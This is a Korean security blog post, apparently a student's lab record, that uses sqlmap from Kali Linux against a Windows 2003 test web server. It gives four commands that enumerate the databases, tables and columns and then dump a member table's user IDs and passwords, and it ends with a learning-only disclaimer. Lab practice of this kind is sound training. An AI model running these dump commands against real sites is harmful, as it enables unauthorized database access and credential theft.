처음 만나는 클라우드 보안

SQLmap 인젝션 자동화 실습 : Window 2003 server 본문

정보보안

SQLmap 인젝션 자동화 실습 : Window 2003 server

영민하게 2022. 5. 12. 11:28
반응형

환경 구축

공격 대상: Window 2003 sever

공격자: Kali Linux

(좌) Win2003서버로 구동된 웹사이트 (우) Kali Linux

 

(참고) 이전 deface공격 해제

http://192.168.5.132/1.jsp => index.jsp 파일의 맨 오른쪽 끝 Edit 클릭

 

해당 포스팅은 이전 SQL 인젝션 자동화방법에 대해 복습한 내용으로 구체적인 설명이 부족합니다. 더욱 자세한 내용은 아래 포스팅 참조바랍니다. https://cloudinfosec.tistory.com/36

 

SQL인젝션(Injection) 자동화

SQL 인젝션 자동화란? 일종의 Blind SQL방식, 자동화 방식으로 반복 작업을 간편하게 수행할 수 있다. : DB에 대한 정보가 없는 상태에서 DB에 질문을 하나씩 전송, YES or NO 형식의 응답이 이어진다. 여

cloudinfosec.tistory.com


SQL인젝션 자동화

1) 데이터베이스 이름 출력

sudo sqlmap -u "http://192.168.5.132/jsp/cmnt_view02.jsp?num=1" --cookie="JSESSIONID=18 DF1 C6 A22 C33 BFD5 AEB49 E8 DD76 A348" --dbs

데이터베이스 이름 출력

 

2) 테이블명 출력

sudo sqlmap -u "http://192.168.5.132/jsp/cmnt_view02.jsp?num=1" --cookie="JSESSIONID=18DF1C6A22C33BFD5AEB49E8DD76A348" -D 04 arg --tables

 

 

3) 칼럼명 출력

sudo sqlmap -u "http://192.168.5.132/jsp/cmnt_view02.jsp?num=1" --cookie="JSESSIONID=18 DF1 C6 A22 C33 BFD5 AEB49 E8 DD76 A348" -D 04 arg -T tbl_member --columns

 

4) 계정 및 비밀번호 출력

sudo sqlmap -u "http://192.168.5.132/jsp/cmnt_view02.jsp?num=1" --cookie="JSESSIONID=18DF1C6A22C33BFD5AEB49E8DD76A348" -D 04arg -T tbl_member -C userid, passwd, username --dump

 

데이터베이스 상의 오류로 Blank로 나타났다

 

 

 

본 게시물은 학습기록을 위한 포스팅입니다. 악의적인 목적으로 이용 시 발생할 수 있는 모든 법적 책임은 자신에게 있습니다.

 

 

반응형
Comments